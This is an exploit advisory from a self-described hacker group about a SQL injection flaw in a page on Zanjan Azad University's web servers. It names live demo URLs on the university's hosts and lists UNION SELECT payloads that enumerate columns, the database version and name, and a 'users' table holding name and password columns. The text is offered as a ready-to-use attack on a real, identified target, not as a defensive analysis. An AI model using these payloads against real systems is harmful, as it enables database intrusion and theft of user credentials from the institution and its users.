|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| |* ______ ____ __ __ | |* /\__ _\/\ _`\ /\ \/\ \ | |* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } | |* \ \ \ \ \ _ <'\ \ _ \ | |* \ \ \ \ \ \L\ \\ \ \ \ \ | |* \ \_\ \ \____/ \ \_\ \_\ | |* \/_/ \/___/ \/_/\/_/ | |* | |* Skote_vahshat and bl4ck.viper | |=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| ========================================================================= \* [Title] :[Zanjan Azad University injection vulnerability] /* \* [Author] :[skote_vahshat] /* \* [Home] :[Http://turk-bh.ir] /* \* [Email] :[skote.vahshat@Gmail.Com] /* ========================================================================== /* /* /* /* Web Server: [ Microsoft-IIS/6.0 ] /* DB Server: [ MSAccess ] /* /* =================================================================== /* [+]Exploit : /* http://www.target.com/pages/index.asp?ID=[SQLi} /* /* [+] (target ) /* [.] (Demo ) /* http://www2.azu.ac.ir/pages/index.asp?ID=-142[sqli] /* http://ns1.azu.ac.ir/pages/index.asp?ID=142+union+select+1,name,3,4,5,6,7+from+users /* [+] /* [+]inject: /* +union+select+1,2,3,4,5,6,7 =>> column 2 /* union+select+1,@@version,3,4,5,6,7 /* union+select+1,database(),3,4,5,6,7 /* /* [+] (table) =>> users /* /* union+select+1,2,3,4,5,6,7from+users /* /* /* [+] column ( name # password ) /* / =================================================================================== |_***_|thanks: bl4ck.viper , dr.tofan , hellboy , netqurd , turk_server kingcope | |_***_| spical thnaks :all tbh member ,iraniyan hacker all turkiS hackers | ===================================================================================